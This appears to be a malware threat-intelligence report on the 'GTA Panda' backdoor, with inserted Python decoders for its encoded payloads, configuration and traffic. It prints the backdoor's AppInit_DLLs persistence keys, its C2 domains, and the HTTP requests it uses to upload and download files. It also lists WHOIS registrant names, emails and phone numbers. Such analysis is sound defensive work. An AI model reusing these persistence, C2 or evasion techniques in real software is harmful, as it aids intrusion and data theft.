Grand Theft Auto Panda

After digging into some recent malicious XLS documents taking advantage of the tried and true CVE-2012-0158 exploit, I came upon some interesting malware, which appears to be actively targeting human rights activists and the automotive industry. Upon further inspection it appears that a number of recent domains and IP addresses are involved; however, at the time of this report only a few were active. In honor of our friends we decided to name this particular threat Grand Theft Auto (GTA) Panda, as they appear to be punching people in the face and stealing their cars. The malware used appears to extend as far back as early 2011 with earlier variants tracing back even further to 2010.

Technical Details

The XLS document was designed to lure victims in through a seemingly negative customer service review, which purported that the recipient had “Serious bad attitude to customers”.

Document Details:
MD5: CFC7254F36F9F0BD77B14218475E7112
File Size: 294,351 Bytes

The document contained another encoded document within its body beginning at offset 0xBE00 as well as an encoded executable beginning at offset 0xF400. Both were encoded using the same scheme of a single-byte XOR against the byte 0x9C and a right rotational byte shift (ROR) of 3. The inner document is what would be shown to a potential victim upon successful exploitation and was saved as "%temp%\~tmp.xls". The outer document’s metadata was stripped from the file, while the inner document contained the following metadata:
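The following carver is an added example, not tooling from the report: it undoes the XOR 0x9C / ROR 3 encoding at the two offsets given above. The report does not state in which order the XOR and the rotate were applied, and gives no lengths, so the decoder tries both orders, keeps the one that reproduces the expected file magic, and carves to end of file; the magics, output filenames and the sample data in the test are assumptions.

```python
"""Carve the XOR-0x9C / ROR-3 encoded objects out of the lure XLS (added
example). The report gives the cipher and the offsets but not the order
of the two operations, so decode() is tried both ways and the order that
reproduces the expected file magic wins. Magics and filenames are assumed."""
import sys

OLE_MAGIC = bytes.fromhex('D0CF11E0A1B11AE1')   # legacy Office container (XLS)
MZ_MAGIC = b'MZ'                                # PE executable
XOR_KEY = 0x9C
ROT = 3


def ror8(b, n):
    """Rotate an 8-bit value right by n bits."""
    n %= 8
    return ((b >> n) | (b << (8 - n))) & 0xFF


def rol8(b, n):
    """Rotate an 8-bit value left by n bits (inverse of ror8)."""
    n %= 8
    return ((b << n) | (b >> (8 - n))) & 0xFF


def encode(blob, xor_first):
    """Reference encoder: XOR then ROR, or ROR then XOR."""
    if xor_first:
        return bytes(ror8(b ^ XOR_KEY, ROT) for b in blob)
    return bytes(ror8(b, ROT) ^ XOR_KEY for b in blob)


def decode(blob, xor_first):
    """Inverse of encode() for the same operation order."""
    if xor_first:
        return bytes(rol8(b, ROT) ^ XOR_KEY for b in blob)
    return bytes(rol8(b ^ XOR_KEY, ROT) for b in blob)


def carve(data, offset, magic):
    """Decode data[offset:] with whichever order reproduces `magic`.
    Returns (decoded_bytes, order_label) or (None, None) if neither fits."""
    for xor_first in (True, False):
        if decode(data[offset:offset + len(magic)], xor_first) == magic:
            label = 'xor-then-ror' if xor_first else 'ror-then-xor'
            return decode(data[offset:], xor_first), label
    return None, None


if __name__ == '__main__':
    with open(sys.argv[1], 'rb') as fh:
        doc = fh.read()
    # offsets from the report: inner XLS at 0xBE00, executable at 0xF400
    for name, off, magic in (('inner.xls', 0xBE00, OLE_MAGIC),
                             ('dropped.exe', 0xF400, MZ_MAGIC)):
        out, order = carve(doc, off, magic)
        if out is None:
            print('%s: no valid magic at 0x%X' % (name, off))
            continue
        with open(name, 'wb') as fh:
            fh.write(out)
        print('%s: %d bytes written (%s)' % (name, len(out), order))
```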

Inner Document Metadata:
Author: cool
Company: MC SYSTEM
Date Created: 5/29/2013 9:48AM
Date Last Saved: 5/29/2013 9:50AM

The dropper was actually a self-extracting 7zip archive, which contained two files that were responsible for the creation and installation of the backdoor and associated files.

SFX Dropper Details:
MD5: DD8499684DF9C314778E4DD858D049F5
File Size: 231,887 Bytes

Embedded 7zip Contents:
Filename: inst.exe
MD5: 0C856287C218C036B4EF08AD880EDEE9
File Size: 46,592 Bytes
Compile Time: 2/25/2013 9:03:04 UTC

Filename: sc.bin
MD5: 6B63CCEED30FED466E3FFA1D9E3D3D34
File Size: 190,775 Bytes

The “inst.exe” binary contained a debug path within the code “e:\SVN\Plat1\Release\Inst.pdb” which suggested it may be formally maintained in a standard SVN code repository. The file “sc.bin” contained shellcode as well as a larger DLL, which contained several additional PE files within a resource named “VERSION”. Interestingly, the DLL also contained the debug path “e:\SVN\Plat1\Release\Inst_dll.pdb”. The dropper, inst.exe, also had several routines to check for the presence of 22 popular Antivirus programs in the registry as well as specifically checking for the presence of a process named “zhudongfangyu.exe” which is part of the Chinese 360 Antivirus Suite. The “inst.exe” binary was designed solely to read in the contents of the file sc.bin in the same local path, allocate memory for it and copy the contents, and finally jump to the beginning of the shellcode. “sc.bin” contained the actual routines necessary to install and configure the backdoor appropriately.

Details of embedded DLL in sc.bin:
MD5: F9966C6AD4DC1A52811FAE63FD3ACA0D
File Size: 187,904 Bytes
Compile Time: 3/13/2013 6:26:42 UTC

File System Changes:

  • %temp%\~tmp.xls
  • %temp%\{Hex Character(s)}.tmp
  • %userprofile%\Documents\My Document\Dtl.dat
  • %userprofile%\Documents\My Document\glp.uin
  • %allusersprofile%\Application Data\Intel\Data\Dtl.dat (Network Config)
  • %allusersprofile%\Application Data\Intel\Data\glp.uin (General Config)
  • %allusersprofile%\Application Data\Intel\Sernem12.dll (Backdoor)
  • %allusersprofile%\Application Data\Intel\sig.dll
  • %allusersprofile%\Application Data\Intel\qjrr.dat (Encrypted DLL)
  • May Create %allusersprofile%\Application Data\Intel\qjss.dat
  • May Create %allusersprofile%\Application Data\Intel\Wincwq12.dat
  • May Create %allusersprofile%\Application Data\Intel\ittr.dat
  • May Create %allusersprofile%\Application Data\Intel\epcnge.dat
  • May Create Files in %allusersprofile%\Documents\My Document\utd_CE31\ with the extension .jpg or .bmp

Volatile Evidence:

  • %temp%\7ZipSfx.000\sc.bin (shellcode deleted)
  • %temp%\7ZipSfx.000\inst.exe (dropper deleted)
  • %allusersprofile%\Application Data\Intel\~1 (temp file)
  • Creates the mutex “Local\MU_ACBPIDS08”
  • Creates the mutex “Local\MU_ACB08”
  • Creates the mutex “Global\{A59CF429-D0DD-4207-88A1-04090680F714}”
  • May create the mutexes:
    • Global\{34748A26-4EAD-4331-B039-673612E8A5FC}
    • Global\{3C6FB3CA-69B1-454f-8B2F-BD157762810E}
    • Global\{43EE34A9-9063-4d2c-AACD-F5C62B849089}
    • Global\{A8859547-C62D-4e8b-A82D-BE1479C684C9}

Registry Changes:

  • HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs -> %allusersprofile%\Application Data\Intel\Sernem12.dll
  • HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows\LoadAppInit_DLLs -> 1

Persistence Mechanism:

  • AppInit_DLLs key in the HKLM hive: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs, which points to the loader %allusersprofile%\Application Data\Intel\Sernem12.dll

The backdoor established persistence via the DLL “Sernem12.dll”, which was configured as an AppInit DLL on the system. In order to execute the backdoor immediately after exploitation, the attacker also included an export named “Run”, which could be called from the command line via rundll32.exe. When the system is rebooted, “Sernem12.dll” will subsequently be loaded into each application that is executed within the current logged-on session. The debug path “E:\SVN\Plat1\Release\ResN.pdb” was left within the binary. Upon further inspection, the DLL actually provided an extensible framework to load and execute additional encrypted modules; in this case “qjrr.dat” was an RC4-encrypted DLL which contained the backdoor functionality. It should be noted that multiple encrypted modules may be contained within the same local directory and loaded within the address space of Sernem12.dll.

00000000   72 58 96 74 39 37 39 31  32 36 00 00 00 00 00 00   rX–t979126......
00000010   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
00000020   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
00000030   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
00000040   00 00 00 00 00 04 01 00  E1 BB 96 9B AE 4E 3E A5   ........á»–›®N>¥

Figure 1: Header of Encrypted DAT File

The loader starts by checking that the first four bytes of the respective DAT file are “72 58 96 74” (the first four bytes in Figure 1). It then reads in the NUL-terminated string that immediately follows the header, up to 0x40 bytes, and stores the value as the RC4 key (“979126” in Figure 1). The size of the encrypted data (0x10400 bytes) is stored as a little-endian DWORD at offset 0x44, just before the start of the encrypted data at offset 0x48. The following Python script can be used to decode these encrypted DAT files.

from Crypto.Cipher import ARC4   # PyCryptodome (or legacy PyCrypto)
import struct
import sys

MAGIC = bytes.fromhex('72589674')   # "rX.t" header of an encrypted DAT file

with open(sys.argv[1], 'rb') as fh:
    binary = fh.read()

if binary[:4] == MAGIC:
    # NUL-terminated RC4 key starts right after the magic (at most 0x40 bytes)
    end = binary.find(b'\x00', 4, 0x44)
    key = binary[4:end if end != -1 else 0x44]
    # little-endian DWORD at 0x44: length of the ciphertext that follows at 0x48
    size = struct.unpack('<I', binary[0x44:0x48])[0]
    encrypted_binary = binary[0x48:0x48 + size]
    decrypted_binary = ARC4.new(key).decrypt(encrypted_binary)
    if decrypted_binary:
        print('Binary Successfully Decrypted: Wrote %s Bytes' % hex(size))
        with open(sys.argv[1] + '.dec', 'wb') as out:
            out.write(decrypted_binary)
else:
    print('Header Structure Invalid')

Figure 2: Python Script to Decode Encrypted DAT Files

The decrypted “qjrr.dat” provided typical backdoor functionality and would allow the attacker to execute commands, enumerate system and drive information, manipulate processes, perform file management operations, and upload and download files. The backdoor contained a slightly different debug path from the previous binaries but the same drive letter, “E:\WORK\Project\T5000\Ver 1.51\Target\1.pdb”. The backdoor referenced two separate configuration files “.\Data\glp.uin” and “.\Data\Dtl.dat”. “glp.uin” was a generic unencrypted configuration file, which specified the encrypted plugins to load as well as document types of interest including .doc, .ppt, .xls, .docx, .xlsx, and .pptx. “Dtl.dat” contained the network configuration for the backdoor encoded with a single byte XOR against the byte 0x5F; the decoded network configuration block is shown in the figure below.

00000020   01 00 00 00 90 1F 00 00  00 00 00 00 74 73 72 76   ...........tsrv
00000030   61 6C 6C 2E 6D 69 63 72  6F 73 6F 66 74 2D 63 65   all.microsoft-ce
00000040   6E 74 72 65 2E 63 6F 6D  00 00 00 00 00 00 00 00   ntre.com........
00000050   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
00000060   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
00000070   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
00000080   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
00000090   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
000000A0   00 00 00 00 00 00 00 00  00 00 00 00 01 00 00 00   ................
000000B0   90 1F 00 00 00 00 00 00  74 73 72 76 61 6C 6C 30   .......tsrvall0
000000C0   31 2E 6E 6F 72 74 6F 6E  2D 75 70 64 61 74 65 2E   1.norton-update.
000000D0   63 6F 6D 00 00 00 00 00  00 00 00 00 00 00 00 00   com.............
000000E0   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
000000F0   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
00000100   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
00000110   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
00000120   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
00000130   00 00 00 00 00 00 00 00

Figure 3: Decoded Network Configuration from "Dtl.dat"
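An added example, not the report's tooling, that decodes "Dtl.dat" with the XOR 0x5F key and parses the C2 records out of it. The record layout (from offset 0x20, 0x8C-byte records of a DWORD flag, a DWORD port, a zero DWORD and a 128-byte NUL-padded hostname) is inferred from Figure 3 and is an assumption, as is the placeholder for the first 0x20 bytes the figure does not show; 0x1F90 in the port field is 8080, matching the port the report names.

```python
"""Decode the backdoor's network configuration file, Dtl.dat (added
example). The XOR key 0x5F and the decoded bytes come from the report;
the record layout is inferred from Figure 3 and is an assumption: from
offset 0x20, 0x8C-byte records of DWORD flag, DWORD port (0x1F90 =
8080), DWORD zero and a 128-byte NUL-padded hostname."""
import struct

XOR_KEY = 0x5F
FIRST_RECORD = 0x20
HEADER_FMT = '<III'                    # flag, port, reserved
HDR_LEN = struct.calcsize(HEADER_FMT)  # 12
HOST_LEN = 0x80
RECORD_SIZE = HDR_LEN + HOST_LEN       # 0x8C


def xor_decode(data, key=XOR_KEY):
    """Single-byte XOR is its own inverse, so this also encodes."""
    return bytes(b ^ key for b in data)


def parse_records(decoded):
    """Return [(hostname, port, flag)] for every populated record."""
    servers = []
    off = FIRST_RECORD
    while off + RECORD_SIZE <= len(decoded):
        flag, port, _reserved = struct.unpack_from(HEADER_FMT, decoded, off)
        raw_host = decoded[off + HDR_LEN:off + HDR_LEN + HOST_LEN]
        host = raw_host.split(b'\x00', 1)[0].decode('ascii', 'replace')
        if host:
            servers.append((host, port, flag))
        off += RECORD_SIZE
    return servers


def c2_servers(raw_dtl):
    """Ordered (host, port) list the backdoor tries, from the on-disk file."""
    return [(h, p) for h, p, _flag in parse_records(xor_decode(raw_dtl))]


def build_record(host, port, flag=1):
    """Build one decoded record; used to construct the sample below."""
    return struct.pack(HEADER_FMT, flag, port, 0) + host.encode().ljust(HOST_LEN, b'\x00')


# Constructed sample: the two records of Figure 3 behind a 0x20-byte
# placeholder header (the figure starts at 0x20), re-encoded with 0x5F
# so that it matches what sits on disk.
SAMPLE_DTL = xor_decode(
    b'\x00' * FIRST_RECORD
    + build_record('tsrvall.microsoft-centre.com', 8080)
    + build_record('tsrvall01.norton-update.com', 8080)
)

if __name__ == '__main__':
    for host, port in c2_servers(SAMPLE_DTL):
        print('%s:%d' % (host, port))
```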

Network Traffic Details and Detection

The backdoor may make DNS requests to "tsrvall.microsoft-centre.com" or "tsrvall01.norton-update.com". It will first attempt to connect to "tsrvall.microsoft-centre.com" on TCP port 8080 and, if that fails, to "tsrvall01.norton-update.com" on TCP port 8080. Communication with these sites is over TCP using either standard HTTP requests or a custom binary protocol.

00000000   65 75 65 75 1C 11 10 75  01 14 07 12 58 5F 6C 6D   eueu...u....X_lm
00000010   66 64 67 75 65 75 05 01  16 75 64 60 65 65 75 66   fdgueu...ud`eeuf
00000020   65 66 65 6D 67 62 6D 75  66 6C 6D 61 60 62 66 62   efemgbmuflma`bfb
00000030   64 67 58 5F 6C 6D 66 64  67 75 65 75 01 14 07 75   dgX_lmfdgueu...u
00000040   64 65 65 65 65 75 67 63  65 65 75 65 65 6F 64 16   deeeeugceeueeod.
00000050   6F 61 67 6F 65 66 6F 64  66 6F 63 64 75 62 60 60   oagoefodfocdub``
00000060   62 67 61 6C 65 58 5F 6C  6D 66 64 67 75 65 75 16   bgaleX_lmfdgueu.
00000070   1C 1B 75 64 65 66 66 75  03 32 17 1F 14 10 18 14   ..udeffu.2......
00000080   03 14 17 1F 14 10 65 14  19 04 17 18 14 13 04 14   ......e.........
00000090   75 36 32 17 64 14 12 61  14 0F 14 17 26 14 12 22   u62.d..a....&.."
000000A0   14 18 22 14 2C 14 16 61  14 0F 04 17 61 14 12 00   ..".,..a....a...
000000B0   14 75 04 04 17 3E 14 12  65 14 34 04 17 20 14 12   .u...>..e.4.. ..
000000C0   3E 14 36 22 17 65 14 1D  1C 14 0C 04 17 65 14 12   >.6".e.......e..
000000D0   6D 14 36 32 14 68 58 5F  6C 6D 66 64 67 75 65 75   m.62.hX_lmfdgueu
000000E0   05 19 1C 75 65 75 02 3C  3B 36 22 24 64 67 7B 31   ...ueu.<;6"$dg{1
000000F0   34 21 75 6D 75 65 75 65  75 7F 58 5F 6C 6D 66 64   4!umueueuX_lmfd
00000100   67 75 65 75 05 19 11 75  65 75 65 58 5F 6C 6D 66   gueu...ueueX_lmf
00000110   64 67 75 65 75 05 19 1C  75 64 75 24 3F 27 27 7B   dgueu...udu$?''{
00000120   31 34 21 75 64 6C 75 65  75 65 75 7F 58 5F 6C 6D   14!udlueueuX_lm
00000130   66 64 67 75 65 75 05 19  11 75 64 75 65 58 5F 6C   fdgueu...udueX_l
00000140   6D 66 64 67 75 65 75 05  19 1C 75 67 75 24 3F 26   mfdgueu...ugu$?&
00000150   26 7B 31 34 21 75 65 75  65 75 65 75 7F 58 5F 6C   &{14!ueueueuX_l
00000160   6D 66 64 67 75 65 75 05  19 11 75 67 75 64 60 67   mfdgueu...ugud`g
00000170   58 5F CD 55 55 55 B2 55  55 55 7D 55 55 55 75 55   X_ÍUUU²UUU}UUUuU
00000180   55 55 2D 28 F2 5C 54 55  55 55 55 55 75 56 1D 55   UU-(ò\TUUUUUuV.U
00000190   55 55 05 55 55 55 CD 28  F2 5C 93 0E 54 2D 6E 55   UU.UUUÍ(ò\“.T-nU
000001A0   B6 06 B1 1B 6E 55 05 55  34 55 26 55 26 55 22 55   ¶.±.nU.U4U&U&U"U
000001B0   3A 55 27 55 31 55 6E 55  55 55 7F 55 7B 55 31 55   :U'U1UnUUUU{U1U
000001C0   3A 55 36 55 6E 55 7F 55  7B 55 25 55 25 55 21 55   :U6UnUU{U%U%U!U
000001D0   6E 55 7F 55 7B 55 2D 55  39 55 26 55 6E 55 7F 55   nUU{U-U9U&UnUU
000001E0   7B 55 31 55 3A 55 36 55  2D 55 6E 55 7F 55 7B 55   {U1U:U6U-UnUU{U
000001F0   25 55 25 55 21 55 2D 55  6E 55 7F 55 7B 55 2D 55   %U%U!U-UnUU{U-U
00000200   39 55 26 55 2D 55 6E 55  55 55 6C 6D 66 64 67 75   9U&U-UnUUUlmfdgu
00000210   65 75 05 19 1C 75 66 75  3C 21 21 27 7B 31 34 21   eu...ufu<!!'{14!
00000220   75 65 75 65 75 65 75 30  2D 25 39 3A 27 30 27 7B   ueueueu0-%9:'0'{
00000230   30 2D 30 58 5F 6C 6D 66  64 67 75 65 75 05 19 11   0-0X_lmfdgueu...
00000240   75 66 75 64 65 67 58 5F  33 55 55 55 54 55 55 55   ufudegX_3UUUTUUU
00000250   54 55 55 55 55 55 75 56  05 55 55 55 7F 55 7B 55   TUUUUUuV.UUUU{U
00000260   31 55 3A 55 36 55 6E 55  7F 55 7B 55 25 55 25 55   1U:U6UnUU{U%U%U
00000270   21 55 6E 55 7F 55 7B 55  2D 55 39 55 26 55 6E 55   !UnUU{U-U9U&UnU
00000280   7F 55 7B 55 31 55 3A 55  36 55 2D 55 6E 55 7F 55   U{U1U:U6U-UnUU
00000290   7B 55 25 55 25 55 21 55  2D 55 6E 55 7F 55 7B 55   {U%U%U!U-UnUU{U
000002A0   2D 55 39 55 26 55 2D 55  6E 55 55 55 55 55 6C 6D   -U9U&U-UnUUUUUlm
000002B0   66 64 67 75 65 75 05 19  1C 75 61 75 30 25 36 3B   fdgueu...uau0%6;
000002C0   32 30 7B 31 34 21 75 65  75 65 75 65 75 30 2D 25   20{14!ueueueu0-%
000002D0   39 3A 27 30 27 7B 30 2D  30 58 5F 6C 6D 66 64 67   9:'0'{0-0X_lmfdg
000002E0   75 65 75 05 19 11 75 61  75 66 63 58 5F 71 55 55   ueu...uaufcX_qUU
000002F0   55 55 55 55 55 55 55 55  55 55 55 55 55 55 55 55   UUUUUUUUUUUUUUUU
00000300   55 55 55 55 55 55 55 55  55 55 55 55 55 55 55 55   UUUUUUUUUUUUUUUU
00000310   55 6C 6D 66 64 67 75 65  75 05 19 1C 75 65 58 5F   Ulmfdgueu...ueX_

Figure 4: Example of Custom Binary Protocol

The information is transmitted encoded using a single byte XOR against the byte 0x55.

0 0 IDE TARG
98312 0 PTC 1500 30308278 3984573712
98312 0 TAR 10000 2600 00:1C:42:03:13:61 75572490
98312 0 CIN 1033 VgBJAEMAVABJAE0ALQBMAFQA cgB1AG4AZABsAGwAMwAyAC4AZQB4AGUA QQBkAG0AaQBuAGkAcwB0AHIAYQB0AG8AcgA=
98312 0 PLI 0 Wincwq12.dat 8 0 0 *
98312 0 PLD 0 0
98312 0 PLI 1 qjrr.dat 19 0 0 *
98312 0 PLD 1 0
98312 0 PLI 2 qjss.dat 0 0 0 *
98312 0 PLD 2 152
---cut---

Figure 5: Partially Decoded TCP Packet

The contents of the current configuration file, "glp.uin", were also transmitted within the same session immediately following the information above. Several key pieces of information were transmitted in this first packet: the MAC address (in the TAR line), a reversed decimal notation of the IP address, the system’s language identifier (in the CIN line), and base64-encoded Unicode (UTF-16LE) representations of the hostname, the process the backdoor is executing within, and the username of the victim (the three remaining CIN fields). The base64-encoded strings above decode to "VICTIM-LT rundll32.exe Administrator". I didn’t delve too far into the command structure of the protocol itself, but it appears to support up to 23 different commands, which perform a wide variety of common administrative tasks. File uploads and downloads appeared to use standard HTTP-formatted requests similar to those in the figure below, with a static User-Agent of "Mozilla/4.0 (compatible; MSIE 8.0; Win32)".
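As an added example (not the report's code), the following decoder strips the XOR 0x55 layer from a beacon and extracts the fields described above from the TAR, CIN and PLI lines. The sample packet is constructed by re-encoding the lines of Figure 5; which TAR field holds the reversed-decimal IP, and that it is a little-endian DWORD, is an assumption made here, as are the other field positions.

```python
"""Decode the custom binary C2 protocol (XOR 0x55) and pull the identifying
fields out of the first packet (added example, not the report's tooling).
Field positions are read from Figure 5; the reversed-decimal IP being the
last TAR field is an assumption."""
import base64

XOR_KEY = 0x55


def xor_decode(data, key=XOR_KEY):
    return bytes(b ^ key for b in data)


def utf16_b64(field):
    """CIN strings are base64 over UTF-16LE text."""
    return base64.b64decode(field).decode('utf-16-le')


def reversed_ip(decimal_str):
    """Assumed: IPv4 stored as a little-endian DWORD rendered in decimal."""
    n = int(decimal_str)
    return '.'.join(str((n >> (8 * i)) & 0xFF) for i in range(4))


def parse_first_packet(raw):
    """Return a dict of the identifying fields from an encoded beacon."""
    info = {'plugins': []}
    for line in xor_decode(raw).decode('latin-1').split('\r\n'):
        fields = line.split()
        if len(fields) < 3:
            continue
        cmd, args = fields[2], fields[3:]
        if cmd == 'TAR' and len(args) >= 4:
            info['mac'] = args[2]
            info['ip'] = reversed_ip(args[3])   # assumption, see above
        elif cmd == 'CIN' and len(args) >= 4:
            info['lang_id'] = int(args[0])      # 1033 is en-US
            info['hostname'], info['process'], info['user'] = map(utf16_b64, args[1:4])
        elif cmd == 'PLI' and len(args) >= 2:
            info['plugins'].append(args[1])     # encrypted plugin on disk
    return info


# Constructed sample: the lines of Figure 5 re-encoded with XOR 0x55, which
# is how they appear on the wire (the first 14 bytes match Figure 4).
SAMPLE_LINES = [
    '0 0 IDE TARG',
    '98312 0 PTC 1500 30308278 3984573712',
    '98312 0 TAR 10000 2600 00:1C:42:03:13:61 75572490',
    '98312 0 CIN 1033 VgBJAEMAVABJAE0ALQBMAFQA '
    'cgB1AG4AZABsAGwAMwAyAC4AZQB4AGUA QQBkAG0AaQBuAGkAcwB0AHIAYQB0AG8AcgA=',
    '98312 0 PLI 0 Wincwq12.dat 8 0 0 *',
    '98312 0 PLI 1 qjrr.dat 19 0 0 *',
    '98312 0 PLI 2 qjss.dat 0 0 0 *',
]
SAMPLE_PACKET = xor_decode(('\r\n'.join(SAMPLE_LINES) + '\r\n').encode('latin-1'))

if __name__ == '__main__':
    for key, value in sorted(parse_first_packet(SAMPLE_PACKET).items()):
        print('%-9s %s' % (key, value))
```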

POST http://{hostname}:{port}/Service.asmx/%d HTTP/1.1
Accept: */*
Host: {hostname}:{port}
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Win32)
Connection: Keep-Alive
Content-Type: Appplication/octet-stream
Content-Length: %d

GET http://{hostname}:{port}/images/%d.asmx?%s HTTP/1.1
Accept: */*
Host: {hostname}:{port}
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Win32)
Connection: Keep-Alive

Figure 6: Example HTTP Requests to Upload and Download Files

One interesting thing to note is that the content type header in the figure above contains an extra “p” which can readily be used to identify this type of traffic.

C2 Infrastructure

I was able to determine several additional subdomains and domain names used by this particular threat group based upon IP telemetry and similar domain parking techniques. The actor typically set only the "www" subdomain to resolve to a legitimate Microsoft IP address so basic browser-based checking of the domain would appear benign.

Additional Active and Parked Subdomains:

{CENSORED}.norton-update.com    255.255.255.255
download.norton-update.com      64.62.184.144
{CENSORED}.norton-update.com    64.62.184.144
support.norton-update.com       64.62.184.144
tsrvall.norton-update.com       64.62.184.144

{CENSORED}.microsoft-centre.com 255.255.255.255
office.microsoft-centre.com     64.62.184.144
o.microsoft-centre.com          192.154.96.153
v.microsoft-centre.com          255.255.255.255
www.microsoft-centre.com        64.4.11.42

The two domains utilized in the sample above used distinct registrant information and email addresses for each domain. Both domains were registered earlier this year, at different times, which suggests a departure from earlier registration techniques.

WHOIS information:

Domain Name:                norton-update.com
Registration Date:          March 12, 2013
Registrant Contact:         mikemike
Email Address:              mike.mike4789@gmail.com
Address:                    L.A.
                            L.A.
                            Araucanía,432610
                            CL
Telephone:                  +56.03478673201

Domain Name:                microsoft-centre.com
Registration Date:          February 19, 2013
Registrant Contact:         wei zhang
Registrant Organization:    zhang wei
Email Address:              mmhl@263.com
Address:                    Qing Se Xiao Qu 5Dong 404
                            cheng du
                            SC
                            314455
                            CN
Telephone:                  14532151311

I also found several older domains, which were all registered with the email address "huamulan2011@yahoo.com" in October of 2012 and 2011. I’ve intentionally removed subdomains specific to victim organizations.

all.mssupports.com          64.62.184.144
ohare.mssupports.com        255.255.255.255
orlando.mssupports.com      0.0.0.0
srv01.mssupports.com        64.62.184.144
update.mssupports.com       0.0.0.0
www.mssupports.com          64.4.11.37

support.mcaupdate.com       64.62.184.144
www.mcaupdate.com           64.62.184.144

support.mseupdate.com       64.62.184.144
www.mseupdate.com           65.55.81.30